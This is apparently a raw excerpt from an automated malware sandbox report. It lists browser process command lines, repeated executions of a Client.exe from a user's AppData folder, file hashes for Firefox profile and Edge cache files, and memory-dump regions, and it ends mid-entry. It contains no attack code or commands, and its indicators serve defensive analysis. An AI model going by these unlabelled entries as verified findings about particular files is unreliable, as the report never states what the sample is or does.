"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.18.1405195493\1341552779" -childID 17 -isForBrowser -prefsHandle 10128 -prefMapHandle 10148 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33ade00c-ce6a-45e1-a633-e0ecedf3674f} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 9856 1f29b309558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4404.19.824604785\1969642871" -childID 18 -isForBrowser -prefsHandle 10364 -prefMapHandle 4560 -prefsLen 27821 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0bc3241-c8dc-4ebb-9cdc-239d78d8197a} 4404 "\\.\pipe\gecko-crash-server-pipe.4404" 4620 1f2994d4e58 tab

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

Network


Files


MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\prefs-1.js

MD5 8c18dbb6b313d8da17d381abded45f19
SHA1 c1c3d2657d1fe64ca74ca01a42a4708970788f22
SHA256 8e60735cc4d1b277797b13f3d265d715bd9431464eae9f4463ac280d6c21f258
SHA512 09f8a2eef92070ebdfe7fccce71a25e84cc7b49b6fb00ca7d974ec9f64e2ec9ba23ed0794aee9412e9cb1c2e58a99142d7f5feb36e799ea51ae0e25e640b6620

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 01e3be1134890887350b361ff9b8c681
SHA1 a92fb77350933689ce4dcf957e9979fd79169270
SHA256 63a6ae4640db7a3c51ed0366f5339e3ea321de2d3dc544599e7999245e1039bd
SHA512 4e7cc68ccc4a192ec865795d159bfb51b13b5347bfc6083dcd86fbf214b0349d6c05bdbd4795ac37f41cd2c83ca309e4fae7faa37a6eaadd2fe2f230196adde8

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 dec02dc294a2834629f0c504d7d2033c
SHA1 316f0c50a22c3c8873f10c9eb2c9ba6c5d608880
SHA256 4cbb3436537a98b1927444b71909ce7fae99596590f20d8f7f1d8b3ffa53a966
SHA512 ed090f5adb78344d5231699f8e87b9cd94bd13069cba03622975ff24faac6fffe4fcfa6dacb31887fca1dd2a7054e5efbfdd54a0236cc8f7b28b2523a4923a66

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 f996183be2b71a7aaca59b4fa743b6bb
SHA1 b30f5cfadb9b97d920700597c5fbb0e8b17d34bc
SHA256 f48004ab1bb2d79f473753cf8a9a2e5cd413355dfc273a983ef06a3e72d27af6
SHA512 8d29d435ea74ed49cd0993cc412cf9ae61a8d95277f0f9fdda8c612e4e2d9cf97b8175200b300abe53cbbe6856f4c5c9ad33b93e4580acf67700232e61d4b34a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 d4ecd037f97483309ceadc5a41b23ea4
SHA1 0778028c2ecf1c9623f6889f38537cbb099c26d9
SHA256 b85f204586b0ac6ea4a086200645723f2e1e2962e45873f11f7ad917b333f490
SHA512 9e39ea418f44c78ff035eecd6c779f4f792369c3e743377510391e4885e92833703d6cbdf9743220a35086ef6458c1734ec3a0df96859ad8f28373d37c392559

memory/3172-1161-0x00000000010E0000-0x00000000010EC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a32777d92780fe997d46965f96edb88b
SHA1 73ff14d8f1663a5e7441a17bc06f4b6711947b47
SHA256 b53e51b4540de993c3fb5c557707429c4a2c1fc52033c9a0f3af5c0ffac5908d
SHA512 db3abaf107bf9d7a9ce240c371334a383e519a9f734cd98aa57ff13096ecd9a0e725d3f81832649d9908841368001812355544e6cd109a30f31b028bf539f0a2

memory/3172-1170-0x000000001B4B0000-0x000000001B53E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 0fdffaaf60fac3dec808113a9d8a475c
SHA1 517e1ec4707dcf3f288e539b7bda901b0a19ad2b
SHA256 3d0211f6009524d6977dd9a8228106bfc2cb9e5fc0378d6faef861bc39546dd1
SHA512 79e4ca3ee1ab94958648eaf5c1eaf4fedebc3c330d4269464a1103567726a54f697ce088854153fa745b0e682efb1259616cb4841404ccdba88c5a0f4f436f33

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 041f5dbafd23f788463381eed941847a
SHA1 8fdc2e7e15d8a422ff08a392048a009f27c3bf61
SHA256 26ec00272fbe71274adafd8e97f916a45399dd2b42f53ea4df76bb82b3a5619e
SHA512 5461e3f9f3357f8075a5753148ebc1540b5d1620048b2a7a343426fd1f79321fb6be047a746584f0e4c0e16e4ba993d247f7c9a5cac82197cf8fe5a78177bd8a

memory/3172-1192-0x00000000011B0000-0x00000000011BA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 50fb02d5ebe5c890e8b29fcffae746a3
SHA1 d3380e95bd0cf4638c1252856af83e5e66cfbf95
SHA256 c3bd66d4389a7fe8067655b7c5056d6ae93008e13e12d8e53057ce903611ddfa
SHA512 2fd132e3e9820898e34d88ec7adb0df977af227de3f5a85382ee90e5b61eae1d3fa8cfe7c08ba90b2f568c964e4cd109fae2c2aaa1b11dc51a329f3e550c42b9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\prefs-1.js

MD5 e2d7b5dc4ab2caa48ce2c2d6a8ef0e05
SHA1 0c4f0f4738f0119dd205f0c87fb314ef63d2dd7f
SHA256 fba3ce15400e50a81b2deb1708b20813db52da4bd61b9cf1c684c6aef46e8dd6
SHA512 40d35ecd4cd64fa0646aff5f3bd7b06aa616ff78b8a9d8bd17bcd381f1a42ea6322457408707bdd82b0207732b6e993f438ea90c81163a0967f699452fd5beb7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\broadcast-listeners.json

MD5 72c95709e1a3b27919e13d28bbe8e8a2
SHA1 00892decbee63d627057730bfc0c6a4f13099ee4
SHA256 9cf589357fceea2f37cd1a925e5d33fd517a44d22a16c357f7fb5d4d187034aa
SHA512 613ca9dd2d12afe31fb2c4a8d9337eeecfb58dabaeaaba11404b9a736a4073dfd9b473ba27c1183d3cc91d5a9233a83dce5a135a81f755d978cea9e198209182

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionCheckpoints.json

MD5 c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA1 5942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA256 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA512 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\targeting.snapshot.json

MD5 edfba10a9cd8b97095344453d024a733
SHA1 7a84c2da263b102c2c5b1b7f88cc20a72e8e429d
SHA256 fa9676ab1a172336bd8228fabf80760d67a3fb505128139e1cef297d802f72dd
SHA512 b8c12140341493d70cfd0441a480c96125a77a7d6e65ea043191bc2e65a7cfe890e1da0f5c8e12e77a8e6ee8765a1eaa6ed062223b417b7732b95d49c2d60696

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 8a7bd80b9a1bf23c8abcd24415d990c3
SHA1 953dc657a3f71eb80bd85d00d60c6267bfa9ad2d
SHA256 9edde090876494709c3ea4a322fd5e27b147ae8a9f35a4acfe711e6eed14f870
SHA512 00dddc3cbf2cfffe844a20246b4eda5fd6471743a9ad284a2eb12869017355585ca53b0ee86ff7355fd51e3658e7e2438c9f5b870952f9a40d6d9b32b4707e45

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 2da7a1b8d8bbeeb3618aab90433c2631
SHA1 269c69378030c5e9cc5efe7a8a3e80f99acd82bd
SHA256 27e5368713002724b9fd3e2b1bb55024329d283d891ddc7010f7ca9ce34bb331
SHA512 e03ce8e07e09bcaae4ff4e8832d9a7fffb0a6c5c46528a3c51fa600ef6fde8a3c5b367ff0c32cc8c3adbffb07ce196f777c4594993310e31eccb054c2ab7c017

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 9a2766fe73084fd83ae53cb5c8c52e97
SHA1 fc734a54e030af524a185e860cdf1831386b7d15
SHA256 1639edd25e9550164ff38683b803a83a97d408057fc90f0a0a0a6710e96dd60d
SHA512 cb0ed0c406807375ed10368b5c52c49f19b4b91f2109daa601970e8d645f1f8801bc2abf049a04c11adc02503040a53a4e7d9f5f7497d37f68d04a77fcb9fbd0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\bookmarkbackups\bookmarks-2024-04-26_11_MaaMR8mhAQTbCgvsLumwIQ==.jsonlz4

MD5 838d93fe7f64f4f752cc6aa88379ef54
SHA1 55f0a2bd40fd96e3a319f886a58891fd9d416c0b
SHA256 1b13e0ebb1dab164edd26588e55ea99c9909f18c56c9a3478937d96719d9a54d
SHA512 8a4fddabc8792bc2fdc4868e1873f415614c3dc08bbb50272b64fbab124b4516ab0e3be04f31cfb8e02e7b653bff231053208d1638dcf0372439dcec71d33f00

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 be7e73da3539dc4f2aec00edef19cb89
SHA1 78bb7de35efdc08935537f68cf3d8bafa471f9f8
SHA256 0517f087376ea1358509e4867d878070cba9ddeb6e24c4b51e32adbd378d1b7a
SHA512 64f00383eca7813465eb00c0540b00807c88a645e557eea2b4048dc897863efe4159a2ce97d7ea181a683432e6cab67718714ec2025e948c86a78527a303b052

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 ded90f0ee21d4684f5cdac179001f169
SHA1 7f612af964a576660d428bebc87d04082b68dcf1
SHA256 ff7435ce30cffdced7c0913810fac71e38891697a4a271424109a8f1fb6201cb
SHA512 a73c62b5a7278597d9bd0adc6668a11a6c6e24d2daec1f496823e5e23c9d89de58662878fd2d710c7f7e508a23a065fc9287ed161d8e10a388f3b36482018278

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 d945a0b1e171065d5491eca4ceafa37c
SHA1 47a98ae32bcd80f0d4ea7cc2cc409ab1a37515cd
SHA256 6fa6a066538e61c84bc0134ecf9b62f01d86a35ca99fdbd77db1a0c57a7f1b02
SHA512 14a1d67c1c59de8ad85f09caf74643928a4f36a17541747ce569f931de981e3f97d47a7c6c8509c4390ba069e308d3bda36da1289984f3d74ae8149324bb96ce

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 62827cb95b2bf00cc4983712c917f1a6
SHA1 d84e91de55c0113f3cd5fa8376db3c2f0faaecf6
SHA256 14ae5bb91ea0f0a51a9b7f57437a7ddbe140df9d3da0affc981b0b318f398900
SHA512 3ef54cc9a66595b63da8a34513a273cb3d59df29284846cc329372978439a65d184c7e0a7e20e97394d78717c4500fa0b48442c52934b779ee0e6c836a0d0c05

memory/3172-1405-0x000000001B560000-0x000000001B572000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 2cd6a220d6c116f48f15d41415046592
SHA1 43d39f4896d7b19d24c549fee1d2209e9e082f4c
SHA256 99b7967e14acd6f65a1c1073fbc824b17a77d8a29d5bcb3dea66b2b49c7bb757
SHA512 10c7d2928b9cfde5076ffd320f9538f83d18472530ad4060f7d9e0520da33ef9a2bc4e169492bc5837c07031037b6e0f8c50a16857a837e0c00d909b7dfeef1f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 5a3a237586a89f481524e4045be7b6f4
SHA1 b5d57f37126bedfd298f93a9e00976b0a9434937
SHA256 1f0ae020a90762fc85d3876ff819692e1eee3671edf155579d599cb2e7cde067
SHA512 e7eb30b0a03bb267c0a4a4696da6cbd701cb67a723df5d330cd10fe8078a4bb027cece59bcd34b13a1a1dea7ec9ff6df7d02b2e93184bad77a520d86019ad891

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 b83fde10314a840a020fe4b56776e1cd
SHA1 122cdfa716f9759a32c9ebdb859371f524204e5d
SHA256 49dc0189909afde29c249b99174d87407c65bf2f192d9a32e33324339cc284b1
SHA512 9c6541a85758eae13e2ac6212bda4fe04a2d747d37a11428a6e6f71eeafbee02df54a57026b164d4bfde6fb8664388404d449dafd007b36fb5a031c604c04ae5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 b50c06c61a473a3af3c992364d70c8b7
SHA1 43fdcd073e24ffe002440db5961c401816659e60
SHA256 7ea8117a98ff4f1d816e07ce064e1a3bfe323e8e63bbe9229e86e8ec1990cdc7
SHA512 260220f0cfc2d64e414bfc906aedb03ba3e58611da00c945d500bffaa4c600b7b6b4ff81de7d738aac5b35b8d302059804cad0cb5a406d5a66221431ea91e038

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 d0945e739ebf61729f12bca2ae7866a6
SHA1 1adf8c749837561583026b535144afa479031563
SHA256 9047e372a584ec0a18f581868da965598486548d595d8398bb8ffee5470aa14d
SHA512 35ba3093a1c5520bf55d2a892a3ebd5095bfe2c0f85b5a99a9d3bfb706d477c5a10feefd432a4e96af9d35f5b4b8484629fc3f1da0268e3f507d0f5c93463028

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 e693a7b8c6d011a3ee999212fef6f8af
SHA1 6492669447a3b7e37c2586f5ec92bf9c57b0df72
SHA256 8170138141dea2a5aa7b1f598abb89baa8667109be47cd6fe1ded428aa33dc80
SHA512 f6dc0cb07fa63b9b531712a0d53ef2f2365fa7dd8073b640b91257965c95d1ce8d59bd726fc0653ff07a1f2a16a1e8acc3c371842e0bc6ae83d6ab0542d6c4c2

memory/1788-1484-0x0000024481600000-0x0000024481610000-memory.dmp

memory/1788-1468-0x0000024481500000-0x0000024481510000-memory.dmp

memory/1788-1503-0x0000024485860000-0x0000024485862000-memory.dmp

memory/5520-1511-0x000002A2B1200000-0x000002A2B1300000-memory.dmp

memory/5520-1512-0x000002A2B1200000-0x000002A2B1300000-memory.dmp

memory/5520-1510-0x000002A2B1200000-0x000002A2B1300000-memory.dmp

memory/404-1527-0x00000277BC900000-0x00000277BCA00000-memory.dmp

memory/404-1530-0x00000277BC670000-0x00000277BC672000-memory.dmp

memory/404-1534-0x00000277BC6B0000-0x00000277BC6B2000-memory.dmp

memory/404-1532-0x00000277BC690000-0x00000277BC692000-memory.dmp

memory/404-1556-0x00000277CDD70000-0x00000277CDE70000-memory.dmp

memory/404-1588-0x00000277CFC00000-0x00000277CFD00000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878

MD5 7665489e087b66e2e4a86748ae5ddbd6
SHA1 432dbea22f1be3a6551976b48d3b4e727612a44f
SHA256 b6a61bbd73867e678a2f63026700607c9da40fdcdc4e78bd7da31c357467be4e
SHA512 ff655a055f054952d72ea4b2d92e5f4dcd677ee900601d7392cf3acaba64f2ef71e9c90192c8f61577964399efc0878564d6ba4fd3d628f53b226ddef2db5d6d

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878

MD5 2922939339db260048aef8adc8ad3a3b
SHA1 f88f5a1cae878e009acb44e184639d83a37aefd4
SHA256 f22e84ebc4b683dc4e166a9eb13ea96312171ef876b3aa07aa9f1932afec95f7
SHA512 d225c0dad835c350e65771301d1be39e9dd8b45c0047d83683527581359c8c025a8772d7310e36c723dc9ec2c3ff354e8f1159996eb6842ca9cd116aa75330e7

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 ac89a852c2aaa3d389b2d2dd312ad367
SHA1 8f421dd6493c61dbda6b839e2debb7b50a20c930
SHA256 0b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45
SHA512 c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 4335b1f9715c6a37980b52911b512f04
SHA1 b0edd8f6c04d657b11e391c91ea838ef266c00c3
SHA256 079ed8e813eb9a3d71f4139df6658035db6f1c11a47fef18e54691f0e53e83a9
SHA512 df55e07d05cb27bbc5fe162def1b4d0db401bac75949ae910fe8ddeca3d9e935ebac9a5d4b9f47218fb893f98c76bd0a21b5e4b9a43c027bbf494eba296baf10

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 069d0310ee29b489c012daa53bbb802d
SHA1 4d1a5fa55d576282b7f308cc8c1fe1ad07ffbc2b
SHA256 8dfae75ff4c447e989ab690b07a4eff686c15a190fdcfe10a4b774eacd029a1f
SHA512 941a3257318a76ac1a939a2c64a9a93764a4f745fecab2ae5b9a7481c85f22f115cccc016917f94ff6e8beef62a6ce23b862bc7507bfe6355649f1baac2a0972

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 754885df53a820eedf1205c148efacc3
SHA1 73ea55048725233e91291d54f272c77d99de212a
SHA256 de080c6253f2960a88c6e6388ef09f90a4ec4a672f70a0e7158f711639058571
SHA512 6435c6c29b085ea9cc342d2d950d081c3d723f4b653f86e5617cdd1cfd1ca6425fff1a1f24f22fc2d0aac05791b4854b6466481bec2be7df25f8d0f8c1a240e7

memory/2340-1608-0x0000029A238C0000-0x0000029A239C0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\intersection-observer.min[1].js

MD5 936a7c8159737df8dce532f9ea4d38b4
SHA1 8834ea22eff1bdfd35d2ef3f76d0e552e75e83c5
SHA256 3ea95af77e18116ed0e8b52bb2c0794d1259150671e02994ac2a8845bd1ad5b9
SHA512 54471260a278d5e740782524392249427366c56b288c302c73d643a24c96d99a487507fbe1c47e050a52144713dfeb64cd37bc6359f443ce5f8feb1a2856a70a

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\webcomponents-ce-sd[1].js

MD5 c1d7b8b36bf9bd97dcb514a4212c8ea5
SHA1 e3957af856710e15404788a87c98fdbb85d3e52e
SHA256 2fed236a295c611b4be5b9bc8608978e148c893e0c51944486982583b210668a
SHA512 0d44065c534313572d90232eb3f88eb308590304c879e38a09d6f2891f92385dc7495aabd776433f7d493d004001b714c7f89855aa6f6bec61c77d50e3a4b8e6

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\web-animations-next-lite.min[1].js

MD5 44ca3d8fd5ff91ed90d1a2ab099ef91e
SHA1 79b76340ca0781fd98aa5b8fdca9496665810195
SHA256 c12e3ac9660ae5de2d775a8c52e22610fff7a651fa069cfa8f64675a7b0a6415
SHA512 a5ce9d846fb4c43a078d364974b22c18a504cdbf2da3d36c689d450a5dc7d0be156a29e11df301ff7e187b831e14a6e5b037aad22f00c03280ee1ad1e829dac8

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\www-i18n-constants[1].js

MD5 f3356b556175318cf67ab48f11f2421b
SHA1 ace644324f1ce43e3968401ecf7f6c02ce78f8b7
SHA256 263c24ac72cb26ab60b4b2911da2b45fef9b1fe69bbb7df59191bb4c1e9969cd
SHA512 a2e5b90b1944a9d8096ae767d73db0ec5f12691cf1aebd870ad8e55902ceb81b27a3c099d924c17d3d51f7dbc4c3dd71d1b63eb9d3048e37f71b2f323681b0ad

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\scheduler[1].js

MD5 dac3d45d4ce59d457459a8dbfcd30232
SHA1 946dd6b08eb3cf2d063410f9ef2636d648ddb747
SHA256 58ae013b8e95b7667124263f632b49a10acf7da2889547f2d9e4b279708a29f0
SHA512 4f190ce27669725dac9cf944eafed150e16b5f9c1e16a0bbf715de67b9b5a44369c4835da36e37b2786aaf38103fdc1f7de3f60d0dc50163f2528d514ebe2243

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_94792986739A07D7C677389B609C9549

MD5 de82d42a975c8016a713dc2db5928817
SHA1 34a4332de0d4db79cb2c7cdce70d0bd19f8b8d23
SHA256 3d7092c5193629502aeb800a22d2c772ebd1a2d5845683ecb1a696ff2826b580
